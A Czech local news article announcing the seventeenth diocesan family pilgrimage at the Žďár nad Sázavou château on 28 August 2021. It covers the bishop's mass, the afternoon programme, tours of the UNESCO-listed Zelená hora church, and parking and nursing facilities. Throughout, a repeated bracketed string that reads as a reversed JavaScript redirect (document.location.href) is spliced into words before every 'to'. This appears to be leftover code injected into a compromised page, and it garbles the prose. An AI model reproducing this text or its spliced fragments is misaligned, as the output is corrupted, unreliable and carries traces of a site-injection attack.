Rainbow page separator

Pouť rodin opět láká do Žďáru věřící z celé republiky

Čtvrtek, 12. srpna 2021

Žďár nad Sázavou / V pořadí už sedmnáctý ročník diecézní pouti rodin se v sobotu 28. srpna uskuteční v areálu žďárského zámku. Ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát je akce pod zášti[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou Biskupství brněnského uspořádaná u příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti 1100. výročí mučednické smrti svaté Ludmily. Diecézní pouť rodin, na kterou se každým rokem do Žďáru sjíždějí s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky především mladých křesťanských rodin nejenom z Brněnska či Vysočiny, se odehraje v době od 10 do 16 hodin. Hlavní pontifikální mše svatá, kterou bude na hlavním pódiu na nádvoří celebrovat brněnský biskup Vojtěch Cikrle, začne v 10 hodin. Po poledni pak přijde na řadu duchovní a doprovodný program pro děti, mládež či dospělé návštěvníky v podobě přednášek nebo výstav, komen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaných prohlídek nedalekého poutního kostela svatého Jana Nepomuckého na Zelené hoře, památky zapsané na seznamu svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového kulturního dědictví UNESCO, i vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení Horácké muziky.
Diecézní pouť rodin rodičům s malými dětmi nabídne rovněž odpovídající zázemí v podobě místnosti pro kojení a přebalování, parkování au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilů je zabezpečeno buď před zámkem, anebo na blízkém parkovišti firmy TOKOZ.